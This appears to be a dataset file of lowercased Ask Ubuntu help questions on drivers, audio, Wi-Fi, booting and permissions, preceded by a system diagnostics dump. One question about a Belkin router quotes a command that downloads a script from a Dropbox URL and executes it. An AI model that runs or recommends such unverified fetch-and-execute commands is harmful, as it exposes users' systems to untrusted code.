rev_c1 display memory : 128.0 mb current mode : 1920 x 1080 ( 32 bit ) ( 60hz ) monitor : plug and play monitor monitor max res : 1600,1200 driver name : nv4_disp.dll driver version : 6.14.0010.5673 ( english ) ddi version : 9 ( or higher ) driver attributes : final retail driver date/size : 4/14/2008 06:42:04 , 4274816 bytes whql logo 'd : n/a whql date stamp : n/a vdd : n/a mini vdd : nv4_mini.sys mini vdd date : 8/3/2004 23:29:56 , 1897408 bytes device identifier : { d7b71e3e-42c5-11cf-9975-0a2060c2cb35 } vendor id : 0x10de device id : 0x0185 subsys id : 0x00000000 revision id : 0x00c1 revision id : 0x00c1 video accel : deinterlace caps : n/a registry : ok ddraw status : enabled d3d status : enabled agp status : not available ddraw test result : not run d3d7 test result : not run d3d8 test result : not run d3d9 test result : not run sound devices description : sigmatel audio default sound playback : yes default voice playback : yes hardware id : hdaudio\func_01 & ven_8384 & dev_7680 & subsys_102801ab & rev_1036 manufacturer id : 1 product id : 100 type : wdm driver name : sthda.sys driver version : 5.10.4568.0000 ( english ) driver attributes : final retail whql logo 'd : n/a date and size : 6/14/2005 18:40:08 , 180864 bytes other files : driver provider : sigmatel hw accel level : full cap flags : 0x0 min/max sample rate : 0 , 0 static/strm hw mix bufs : 0 , 0 static/strm hw 3d bufs : 0 , 0 hw memory : 0 voice management : no eax ( tm ) 2.0 listen/src : no , no i3dl2 ( tm ) listen/src : no , no sensaura ( tm ) zoomfx ( tm ) : no registry : ok sound test result : not run sound capture devices description : sigmatel audio default sound capture : yes default voice capture : yes driver name : sthda.sys driver version : 5.10.4568.0000 ( english ) driver attributes : final retail date and size : 6/14/2005 18:40:08 , 180864 bytes cap flags : 0x0 format flags : 0x0 directmusic dls path : c : \windows\system32\drivers\gm.dls dls version : 1.00.0016.0002 acceleration : n/a ports : microsoft synthesizer , software ( not kernel mode ) , output , dls , internal , default port sigmatel audio , software ( kernel mode ) , output , dls , internal microsoft midi mapper [ emulated ] , hardware ( not kernel mode ) , output , no dls , internal microsoft gs wavetable sw synth [ emulated ] , hardware ( not kernel mode ) , output , no dls , internal registry : ok test result : not run directinput devices device name : mouse attached : 1 controller id : n/a vendor/product id : n/a ff driver : n/a device name : keyboard attached : 1 controller id : n/a vendor/product id : n/a ff driver : n/a poll w/ interrupt : no registry : ok
488908	extra unneeded packages	i have ubuntu 12.04 installed . it was an upgrade from 11.10 . i removed the gui so that i just have the command line . i was wondering if there was a way to remove all the unnecessary packages that came with gnome/unity ? i am basically looking for bare minimum to run as a server . i have things like firefox , games , music , bluetooth that i have to uninstall . is there a command to uninstall everything down to core basics ? or is there a list out there of packages that i can delete and still have an operating distro ?
488909	how to set up broadband connection in ubuntu 14.04 desktop version	i have installed ubuntu 14.04 lts alongside windows xp . my broadband connection working ok in windows xp , but it is not working in ubuntu . i want to connect through lan over pppoe . please guide me on how to set up a wired dsl connection .
488919	no rear audio when front jack is connected	i have ubuntu 14.04 64bit dual booted . when i connect something on front audio jack then rear audio is not working . i have tried changing analolog-output-headphones.conf file . after changing that alsamixer showing that both centre and surround not muted with full volum . unfortunately no audio . aplay -l **** list of playback hardware devices **** card 0 : sb [ hda ati sb ] , device 0 : alc887-vd analog [ alc887-vd analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : sb [ hda ati sb ] , device 1 : alc887-vd digital [ alc887-vd digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0
488922	bad ram in dimm1 need to limp by till monday , can i temporarily disable a memory slot ?	got to work , started windows , immediately blue screened as soon as i logged in . after a few tries i ran diagnostics and found the ram in dimm1 was bad . i can boot into ubuntu and it runs pretty well i can at least get some work done this way but i do get frequent lock-ups which i suspect are ram related . is there anyway to temporarily just disable that memory ? i have 16 gig so i would have plenty left without that chip . i can not physically remove it as the laptop ( dell xps 9530 ) requires a t-2 driver to open and i donât have one here . also the buses home donât start till 3pm and its only 11am so i am stuck for now . ideas ?
488923	tv connected , laptop monitor should turn off	have hp nvidia 7400m gpu laptop with vga connected to sony tv . have been using ubuntu with my sony lcd for 4 years . earlier in 2011-12 the screensaver would run on the monitor and switch it off even while the vlc would run normally on tv . firstly i hate the fade system of screensaver . secondly , i only want to turn of my monitor not tv . now both are turning off . this was never an issue before , now its happens with 2014 ubuntu . i had reformatted and got latest ubuntu . how do i switch off my monitor when vlc or youtube fulscreen is running on my tv ?
488924	why ubuntu sdk do not highlight htm code ?	i just sterted with the ubuntu sdk , but , hell , the highlight not even works ! how can i make the highlight to work like it should do , in the settings , the mimetype handler use a simple text file style for the html code . every programer needs the highlight working is a great help for us . please tellme that there is a fix .
488926	my wlan card is not working propperly after suspending my laptop	i have an old laptop . i installed lubuntu on it , and everything was working propperly , until i desided to test suspending the laptop . the machine suspends and wakes propperly , but since i woke it the wlan connection is gone . i have tried several things to get it back to running but nothing has helped . i tried to reboot my computer but the interface is still down . here are the outputs i get when i start my pc : michael @ secure : ~ $ sudo rfkill list [ sudo ] password for michael : 0 : phy0 : wireless lan soft blocked : yes hard blocked : no then i do : michael @ secure : ~ $ sudo rfkill unblock 0 michael @ secure : ~ $ sudo rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no then : michael @ secure : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:90 : f5 : fe:67 : f0 up broadcast multicast mtu:1500 metric:1 rx packets:5888 errors:0 dropped:0 overruns:0 frame:0 tx packets:5976 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2277538 ( 2.2 mb ) tx bytes:1073281 ( 1.0 mb ) interrupt:45 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:3463 errors:0 dropped:0 overruns:0 frame:0 tx packets:3463 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:261721 ( 261.7 kb ) tx bytes:261721 ( 261.7 kb ) michael @ secure : ~ $ sudo ifconfig wlan0 up michael @ secure : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:90 : f5 : fe:67 : f0 up broadcast multicast mtu:1500 metric:1 rx packets:5888 errors:0 dropped:0 overruns:0 frame:0 tx packets:5976 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2277538 ( 2.2 mb ) tx bytes:1073281 ( 1.0 mb ) interrupt:45 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:3740 errors:0 dropped:0 overruns:0 frame:0 tx packets:3740 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:285808 ( 285.8 kb ) tx bytes:285808 ( 285.8 kb ) wlan0 link encap : ethernet hwaddr 48:5d:60 : a7 : a2 : a5 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) after this the nm-applet will still not show any wireless neworks . info aout bmy wlan card are as follows : michael @ secure : ~ $ sudo lshw -c network *-network description : wireless interface product : rtl8191sevb wireless lan controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:13:00.0 logical name : wlan0 version : 10 serial : 48:5d:60 : a7 : a2 : a5 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192se driverversion=3.13.0-24-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:16 ioport:2000 ( size=256 ) memory : f0100000-f0103fff *-network description : ethernet interface product : jmc260 pci express fast ethernet controller vendor : jmicron technology corp. physical id : 0.5 bus info : pci @ 0000:14:00.5 logical name : eth0 version : 02 serial : 00:90 : f5 : fe:67 : f0 size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm pciexpress msix msi bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=jme driverversion=1.0.8 duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:45 memory : f0200000-f0203fff ioport:3400 ( size=128 ) ioport:3000 ( size=256 ) did i break my wlan card ? how can i get it to work with suspend ? i have not tried to boot from usb . but i will to see if the card works then . does anybody know something else i can try ?
488929	avr plugins not able to install in eclipse . it says missing requirements	these are the things i followed in eclipse to download plug-ins . first i went to the help option in eclipse and then install new software and it opened a window . in that i typed the site for avr plug-ins ( http : //avr-eclipse.sourceforge.net/updatesite/ ) then in the box below it showed just one option containing avr eclipse plug-in . then after selecting the option ( i.e the avr eclipse plug-in ) . then after clicking next it was searching for requirements and dependencies and then the install details said that the install could not be completed details ( can not complete the install because one or more required items could not be found . software being installed : avr eclipse plugin 2.4.1 ( de.innot.avreclipse.feature.group 2.4.1 ) missing requirement : de.innot.avreclipse.ui 2.4.1 requires 'bundle org.eclipse.cdt.core 4.0.1 ' but it could not be found can not satisfy dependency : from : avr eclipse plugin 2.4.1 ( de.innot.avreclipse.feature.group 2.4.1 ) to : de.innot.avreclipse.ui [ 2.4.1 ] ) as shown in the internet on youtube i followed the above steps for installing avr plug-ins https : //www.youtube.com/watch ? v=6axn2en86aq in the 2nd step it was showing options cdt optional features 1.avr eclipse plugin 2.avr eclipse plugin sources please help me out friends .
488933	ca n't upgrade kernel to 3.13.0-30 on 14.04	i think i broke something with apt on my system . i 'm trying to update the kernel to 3.13.0-30 , but when i run apt-get i 'm getting the following output : reading package lists ... done building dependency tree reading state information ... done linux-headers-3.13.0-30-generic is already the newest version . suggested packages : fdutils linux-doc-3.13.0 linux-source-3.13.0 linux-tools the following new packages will be installed : linux-image-3.13.0-30-generic linux-image-extra-3.13.0-30-generic 0 upgraded , 2 newly installed , 0 to remove and 1 not upgraded . need to get 0 b/51.9 mb of archives . after this operation , 194 mb of additional disk space will be used . do you want to continue ? [ y/n ] y selecting previously unselected package linux-image-3.13.0-30-generic . ( reading database ... 288027 files and directories currently installed . ) preparing to unpack ... /linux-image-3.13.0-30-generic_3.13.0-30.54_amd64.deb ... done . unpacking linux-image-3.13.0-30-generic ( 3.13.0-30.54 ) ... selecting previously unselected package linux-image-extra-3.13.0-30-generic . preparing to unpack ... /linux-image-extra-3.13.0-30-generic_3.13.0-30.54_amd64.deb ... unpacking linux-image-extra-3.13.0-30-generic ( 3.13.0-30.54 ) ... setting up linux-image-3.13.0-30-generic ( 3.13.0-30.54 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.13.0-30-generic /boot/vmlinuz-3.13.0-30-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.13.0-30-generic /boot/vmlinuz-3.13.0-30-generic update-initramfs : generating /boot/initrd.img-3.13.0-30-generic mount : /usr/local/lib/libuuid.so.1 : no version information available ( required by /lib/x86_64-linux-gnu/libblkid.so.1 ) cp : can not stat ‘/sbin/blkid : ’ : no such file or directory cp : can not stat ‘/usr/local/lib/libuuid.so.1 : ’ : no such file or directory cp : can not stat ‘no’ : no such file or directory cp : can not stat ‘version’ : no such file or directory cp : can not stat ‘informationavailable’ : no such file or directory cp : can not stat ‘/sbin/dumpe2fs : ’ : no such file or directory e : /usr/share/initramfs-tools/hooks/fixrtc failed with return 1. update-initramfs : failed for /boot/initrd.img-3.13.0-30-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.13.0-30-generic.postinst line 1025. dpkg : error processing package linux-image-3.13.0-30-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-extra-3.13.0-30-generic : linux-image-extra-3.13.0-30-generic depends on linux-image-3.13.0-30-generic ; however : package linux-image-3.13.0-30-generic is not configured yet . dpkg : error processing package linux-image-extra-3.13.0-30-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-image-3.13.0-30-generic linux-image-extra-3.13.0-30-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 'm not sure how to troubleshoot this . i can do an apt-get remove on linux-image-3.13.0-30-generic linux-image-extra-3.13.0-30-generic linux-headers-3.13.0-30-generic and that at least removes the error so i can do apt-get stuff again . but even when i do an update-grub i get the following error : udevadm : /usr/local/lib/libuuid.so.1 : no version information available ( required by /lib/x86_64-linux-gnu/libblkid.so.1 ) anyone have any ideas ?
488934	grub remains on drive after formatting , cant boot from cd/usb	i am trying to install windows 7 on an old system , which had ubuntu 12.10 on it . i accessed the drive with a cradle and deleted the partitions off of it , then formatted it to ntfs ( for windows ) . popped it back in the system and tried to boot from cd to install windows 7 and i get : error : unknown filesystem grub rescue > how did grub even survive the formatting and how can i get rid of it for good so i can do a fresh install of win 7 ?
488935	audio issues , cutting out and random loud noises the more things it has to process	i 'm stuggling with audio problems with ubuntu on my desktop pc , when audio skips and paused and sometimes dies completely and produces loud static . if all i 'm doing it watching youtube things are usually ok . but if i play a game , or do multiple tasks where multiple sounds are being mixed i get the problems more frequently . restarting alsa or pulse fixes nothing , all i can do is reboot the system or switch between hdmi and optical a few times and it goes away . i 'm using hdmi on my nvidia card using proprietary drivers . i used this page : https : //wiki.ubuntu.com/pulseaudio/log to produce a log here : http : //pastebin.com/h5au5beh http : //pastebin.com/xdvb4eaf http : //pastebin.com/tvx1fgjv all i did was to run the commands , load planetary annihilation through steam , get the skipping problem and save the output . i ca n't see much in there myself . any help appreciated !
488936	libreoffice writer inconsistent units : lines & inches	i 've been formatting documents in libreoffice and am really confused by the inconsistent usage of units in its styles - i refer to the paragraph styles editing dialog . often , when i try to edit a style , the units become weird - sometimes , i see inches used as the units , but other times , i see lines used as the units . my question : why does libreoffice switch between these units ? when does it use inches and when does it use lines ( or is it a bug ) ? how can i make sure only one unit is used while i edit a document ( because it gets really annoying to see my units suddenly change and the entire document gets messy ) ? thanks !
488946	belkin fsd8236-4 router does not connect in ubuntu 14.04	i did a clean install of ubuntu 14.04 on a acer aspire e1-731 . i get the router announced as `` belkin_n_wireless_25276d . when i try to connect to internet via the router it fails . in windows 8.1 connection to internet via the router is ok. what approach should i take to fix this ? on the upper right of the screen we have a connection editor and i tried to change from automatic ( dhcp ) to manual but this seems not to be allowed . when in ubuntu 14.04 , i ask for : connection information i get the following data active network connections telenet homespot ( this connection '' i get when i try to connect tot the router ) general interface 802.11wifi ( wlan0 ) hardware address 48 : d2:24 : bd:59:32 driveer : speed : 1mb/s security : none ipv4 ip address 10.113.126.119 broadcast address 10.113.127.255 subnet mask 255.255.254.0 default route 10.113.126.1 primary dns 195.130.130.141 secondary dns 195.130.131.141 ipv6 wired connection1 ( default : my normal internet connection ) general interface ethernet ( eth0 ) hardware address 54 : be : f7:57:9f:73 driver : speed 100mb/s security none ipv4 ip address 84.195.61.4 broadcast address 84.195.63.255 subnet mask 255.255.224.0 default route 84.195.32.1 primary dns 195.130.130.3 secondary dns 195.130.131.3 ipv6 ignored see also ; http : //pastebin.ubuntu.com/7722680/ as a result of the script wget -n -t 5 -t 10 http : //dl.dropbox.com/u/57264241/wireless_script & & \ chmod +x wireless_script & & \ ./wireless_script in windows 8.1 we have the following data for the belkin router belkin ssid : belkin_n_wireless_25276d protocol : 802.11n beveiligingstype : open fabrikant : qualcomm atheros communications inc. beschrijving : qualcomm atheros ar956x wireless network adapter stuurprogrammaversie : 10.0.0.251 fysiek adres : â48-d2-24-bd-59-32 verbindingsspecifiek dns-achtervoegsel : belkin dhcp ingeschakeld : ja ipv4-adres : 192.168.2.2 ipv4-subnetmasker : 255.255.255.0 lease verkregen : dinsdag 24 juni 2014 19:29:24 lease verloopt : zaterdag 1 augustus 2150 2:49:31 ipv4-standaardgateway : 192.168.2.1 ipv4 dhcp-server : 192.168.2.1 ipv4 dns-server : 192.168.2.1 ipv4 wins-server : netbios via tcpip ingeschakeld : ja link-local ipv6-adres : fe80 : :2dd9:32a4:7cab : bf24 % 4
488952	problem importing contacts from vcf file into ubuntu touch	i tried syncevolution -- import /home/phablet/documents/1.vcf backend=evolution-contacts database=personal but got this error message [ error ] glib-gobject : g_object_unref : assertion 'g_is_object ( object ) ' failed [ error ] creating source registry : can not autolaunch d-bus without x11 $ display any suggestions ?
488953	being a new user facing login problem	i 'm new to ubuntu . when i installed the ubuntu 13.10 by installing wubi.exe , i was asked to reboot . the reboot was successful , being totally new to the ui i was amazed but when the log on screen popped out , i was surprised as i 'm not having anything ( no username , no password ) and it is asking for the username and password . please help me .
488961	how to know if i am behind a vpn	i am currently trying to connect to vpn network of my company on 14.04 and wanted to know if there is any way to know that i am currently connected to the vpn . i have tried to find my public ip and do an whois lookup to check if my company owns the ip , and i have found that it works . is there any better way to check up if i am connected to vpn ?
488967	changing python version without breaking software center	i have been fiddling with my python installation on ubuntu 12.04 ( i was having trouble installing a python library ) , and at one point my python command was n't working . it turned out the symlink was missing ( i must have removed it by accident lol ) , so i made a new one pointing to python 3.2 ( originally pointed to 2.7 ) : sudo rm /usr/bin/python sudo ln -s /usr/bin/python3.2 /usr/bin/python problem : the software center and update manager were n't working : ~ $ software-center file `` /usr/bin/software-center '' , line 152 print time.time ( ) ^ syntaxerror : invalid syntax i guessed this was because i had changed the default python version ( 2.7- > 3.2 ) , so i changed it back to 2.7 . now they work fine , but i 'd still like to change the 'default ' python version ( i.e . the one called with python in the terminal ) . is it possible to do that in ubuntu 12.04 ? thanks !
488968	when i try to add a new node to maas , does the node need a physical internet connection ?	i have two networks : for local and internet connection for maas network as a private network here are my questions : when i try to add a new node to maas , does the node need a physical internet connection ? ... because it tries to download something from the internet ( ubuntu ) site ? why does it need something from the internet , because i thought everything is ready to use in maas and nodes can get those from the maas server ? if it needs an internet connection , how we can connect the server to the internet ? because as you know when we try to add a node we have to define its main network that private network which is not connected to the internet ! ! so i get a can not connect to the internet error at the last step of node enlisting !
488969	ubuntu 10.04 : can i format a drive on one server and move it to a different server ?	i 'm not very familiar with the intricacies of linux filesystems , and have minimal experience with formatting and mounting drives , so please excuse this noob question ... we recently upgraded a secondary ext4 drive on a production server , and it took a good 90 minutes for the mke2fs step . so i 'm wondering if we could have done that step on a different server , to prepare the drive first , and then moved it to the final target server ? there was a guid assigned to the drive at some point , and i 'm wondering if that was somehow tied to the o.s . where the command was executed , or if it 's completely fine to do this drive preparation elsewhere .
488970	after updating , can not record sound	before updating yesterday , i could normally record internal sound with the built-in sound recorder . i tinkered with all pulseaudio 's profiles ( http : //i.stack.imgur.com/4pmvo.png ) but got nothing . however , when i set it to off ( all sounds are muted ) http : //i.stack.imgur.com/hf7ha.png , recorder starts to record properly and all other recorders too do the same ! anyone encountered this after installing the last updates ?
488971	ubuntu 14.04 nvidia drivers crash system !	every time my system is using opengl or anything to do with my graphics card other than booting ( using xorg driver , nothing else works ) the system just freezes and i can only control the mouse . then shortly after the mouse stop working . this happens frequently so i uninstalled ubuntu , but i would like to see if there is a solution that will get me running again .
488976	12.04 dual boot with desktop and server - what order to insall ?	in a couple of weeks i will have a new computer with no os installed . i want to set it up as a dual boot with server as the default and desktop as an option at boot time . i want to make the installation of the two oss as simple as possible . which do i install first , server or desktop ? i need a dual boot as i need to do application development on this machine that has all the hardware that i need but need to do testing for deployment in a headless environment . i 'm planning to use 12.04 lts since i have a vendor driver that has not been tested on later versions of the kernel . i 'm fairly new at linux
488978	how to install jre 7u60 on ubuntu 14.04 using the tar.gz file ?	how do i install jre without ppas or anything but the tar.gz file i downloaded from : http : //www.java.com/en/download/manual.jsp ? locale=en
488979	how to change lines at the grub2 boot entry	i have installed the new version of ubuntu , 14.04 , with windows xp . at first , by booting i had the error message : serious errors were found while checking the disk drive for / . i found a solution at `` ubuntu 14.04 not booting after error message . /temp could not be mounted '' . but i could only change the grub2 boot entry . when i boot with ubuntu : start the terminal and type sudo vi /etc/grub.d/10_lupin and enter . i find the line : linux $ { rel_dirname } / $ { basename } root= $ { linux_host_device } loop= $ { loop_file_relative } ro $ { args } and change it to : linux $ { rel_dirname } / $ { basename } root= $ { linux_host_device } loop= $ { loop_file_relative } rw $ { args } but after that , i do n't know what to do ?
488980	directory with readable and unreadable files	i am root . i want to make a directory , supersensitivedirectory , private so that only root can even read the files inside it and its sub-directories . there are passwords in these files , and they should not be visible to any users besides root . there are two log files in a sub-directory of my supersensitivedirectory , though , that i want to be visible ( though not writable ) to everyone . ideally , i 'd make supersensitivedirectory private and add some kind of exception for the log files . how can i do this ? if if ca n't be done , is there a way to recursively change all the files in supersensitivedirectory to 700 permissions ? if i did that , i could then individually change the permissions for the log files .
488986	how to check resync of megaraid ?	i previously use software-based raid , and 'cat /proc/mdstat ' can show the resync progress . now i use hardware-based raid ( perc h710p ) , i wonder if there is way to check resync progress using megacli . thanks a lot !
488987	ca n't connect to virtualbox server	i have an ubuntu 12.04 server running in virtualbox and i recently switched it to a new host running ubuntu 14.04 . after the switch the guest can connect to the internet , no other machines can connect to it including the host . i 'm using a bridged network with promiscuous mode enabled . the guest server 's static ip and mac address did not change when i switched it to the new host . i also disabled both firewalls with sudo ufw disable this is the output of host ifconfig -a eth0 link encap : ethernet hwaddr 00:25:90 : c0:71 : bc up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) memory : df220000-df240000 eth1 link encap : ethernet hwaddr 00:25:90 : c0:71 : bd inet addr:141.140.167.10 bcast:141.140.167.255 mask:255.255.255.0 inet6 addr : fe80 : :225:90ff : fec0:71bd/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:87421 errors:0 dropped:0 overruns:0 frame:0 tx packets:81851 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:80380106 ( 80.3 mb ) tx bytes:65415267 ( 65.4 mb ) memory : df200000-df220000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:26793 errors:0 dropped:0 overruns:0 frame:0 tx packets:26793 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:117485530 ( 117.4 mb ) tx bytes:117485530 ( 117.4 mb ) guest ifconfig -a eth0 link encap : ethernet hwaddr 08:00:27:81:11:33 inet addr:141.140.82.130 bcast:141.140.82.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fe81:1133/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1553 errors:0 dropped:0 overruns:0 frame:0 tx packets:2561 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:510293 ( 510.2 kb ) tx bytes:208253 ( 208.2 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:37901 errors:0 dropped:0 overruns:0 frame:0 tx packets:37901 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:11162617 ( 11.1 mb ) tx bytes:11162617 ( 11.1 mb )
488988	subshell in script wont print corectly	why does my shell and subshell only print the first hour in my for loop ? it 's supposed to loop through all 24 hours in a day but only prints the first hour correctly . { for d in $ ( seq -f `` % 02g '' 1 9 ) ; do file= ( $ ( find -name `` paloalto_traffic_ $ m- $ d- $ y.zip '' ) ) unzip -j $ file filetmp= ( $ ( find -name `` traffic_ $ m- $ d- $ y.total '' ) ) d= $ ( echo $ d | sed -e 's/^0*// ' ) for i in $ ( seq -f `` % 02g '' 0 23 ) ; do echo $ i grep -f -s `` $ month $ d $ i : '' $ filetmp > tempoutput1.txt countallow= ( $ ( grep -f -c 'allow ' tempoutput1.txt ) ) countdeny= ( $ ( grep -f -c 'deny ' tempoutput1.txt ) ) # add new 'variable= ( $ ( grep ) ) statement here' echo -e `` $ m/0 $ d/ $ y $ i:00 , $ countallow , $ countdeny '' > > ad-results- $ month- $ y echo `` $ ( ( 10 # $ i+1 ) ) /24 hours completed for $ month $ d '' rm -f $ filetmp done done } & # subshell 2a { for d in $ ( seq -f `` % 02g '' 10 18 ) ; do file= ( $ ( find -name `` paloalto_traffic_ $ m- $ d- $ y.zip '' ) ) unzip -j $ file filetmp= ( $ ( find -name `` traffic_ $ m- $ d- $ y.total '' ) ) for i in $ ( seq -f `` % 02g '' 0 23 ) ; do grep -f -s `` $ month $ d $ i : '' $ filetmp > tempoutput2.txt countallow= ( $ ( grep -f -c 'allow ' tempoutput2.txt ) ) countdeny= ( $ ( grep -f -c 'deny ' tempoutput2.txt ) ) # add new 'variable= ( $ ( grep ) ) statement here' echo -e `` $ m/ $ d/ $ y $ i:00 , $ countallow , $ countdeny '' > > ad-results- $ month- $ y echo `` $ ( ( 10 # $ i+1 ) ) /24 hours completed for $ month $ d '' rm -f $ filetmp done done } wait sample output data : ( date time , allow , deny ) 05/10/2014 00:00,3242,6758 05/10/2014 01:00,0,0 # this should be the same as above line but outputs 0,0
488989	dual monitor not recognized in xubuntu 14.04	i have a dell latitude laptop e6440 . the laptop have two in4terfaces , vga and hdmi . i connect an external monitor to the vga port , but when i ran the xfce4-display-settings i see only one monitor ( the laptop one ofcourse ) . how can i make it to recognize the second monitor ? i already tried booting when it is connected . still no help . here is some info : i am using xubuntu 14.04 : linux 3.13.0-30-generic # 54-ubuntu smp mon jun 9 22:45:01 utc 2014 x86_64 x86_64 x86_64 gnu/linux i have a dual graphic adapter : one is : 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) second one is : 01:00.0 display controller : advanced micro devices , inc. [ amd/ati ] sun xt [ radeon hd 8670a/8670m/8690m ] xrandr says : xxx @ dellorian : ~ $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 1600 x 900 , current 1600 x 900 , maximum 1600 x 900 default connected 1600x900+0+0 0mm x 0mm 1600x900 77.0* any help ? 10x .
488991	compizconfig question !	problem : control left click is not opening up a window in a new page . reason : i believe it has something to do with compizconfig settings manager . could anyone guide me on how to reset ccsm to default settings ?
488992	hp pavillion 17-e67cl black screen ubuntu 14.04 , only boots with vga in	during the boot up of the livecd of ubuntu , the screen was black . i connected the computer to vga to see what was happening . once ubuntu started up ( i used the try ubuntu option ) i could then see everything so i disconnected the vga . i installed it fine . i then turn on the computer to find that it stays at a black screen and from the fans and lack of login sound , i know that it is stuck at some startup process . ( i had it set to log in automatically ) i try again with the vga attached and it went in perfectly to the desktop and the desktop showed on the laptop screen again . i tried setting the grub to nosetmode and have had no luck researching this problem . the black screen is on grub , the loading screen , and the login screen . ( the lock screen and login screen work fine if you log out or lock computer , only a problem when just turning computer on ) the 2 issues : needs vga to load ubuntu screen shows black during everything before login . computer : hp pavillion 17-e67cl ubuntu : 14.04-lts this is getting marked as a duplicate when in fact it is not a duplicate , please read fully through a question before setting it to duplicate moderators . i already had a reply claiming it was a duplicate and i explained that nomodeset did not work . the solution in the other thread does not work , i need a new solution . i did however get another reply which i will be testing soon . i also wrote that there are 2 issues , ubuntu will not start up unless vga is plugged in , i can tell this by the fans . when i tried recovery mode and did failsafe graphics it had an error code . no monitor attatched . this is a laptop therefore there is clearly a monitor attatched . the computer does not read the laptop monitor as being attatched until i am logged in .
488997	ufw throws `` bad port ''	on ubuntu server , i try to open port 5432 for postgresql : $ sudo ufw allow 5432/tcp error : bad port postgresql is not currently running and netstat shows no processes currently using that port . what is going on here ?
488998	ubuntu 14.04 failed liveusb boot on lenovo g580	so.. hello , everyone . i have a lenovo g580 laptop , with 4 gb ram , intel core i3 , 2.5ghz and pre-installed windows 8 , which i updated to windows 8.1 . i was like `` wow , it 's be so nice to have ubuntu on it , aswell '' , since i 'm planning on going to an it college and i heard it 's easier to use for perl and python programming . ( yeah , i 'm young ... ) so , getting back to the subject.. i want to install ubuntu 14.04 on the same machine with a windows 8.1 . i downloaded the desktop ubuntu 14.04 iso and `` installed '' it on a usb 16gb flash drive , trying to boot from it , with 'yumi â your universal multiboot installer ' . i left 90gb of unpartitioned disk space . i disabled secure boot without disabling uefi , then i plugged in the flash drive and chose the option so the laptop would boot from efi drive ( which seemed the right one ) . here 's where the problems start appearing . if i do n't press anything , i only leave the flash drive plugged in and i turn on or restart the laptop , it gets stuck at the black loading screen , with the white lenovo logo . with no real reason . if i boot from usb flash drive with enabled uefi , the laptop restarts all by itself when it reaches the same black loading screen . again , and again , and again ... until i turn the laptop off manually . if i boot from usb flash drive with enabled legacy mode , the laptop gets stuck ( again ) at the same black loading screen with the lenovo logo . i 've googled this all day , but it seems there 's no topic / tutorial about this problem . ( or i have n't found it ? i do n't know . ) i 'd need some help , since i really want to have ubuntu installed here . thanks .
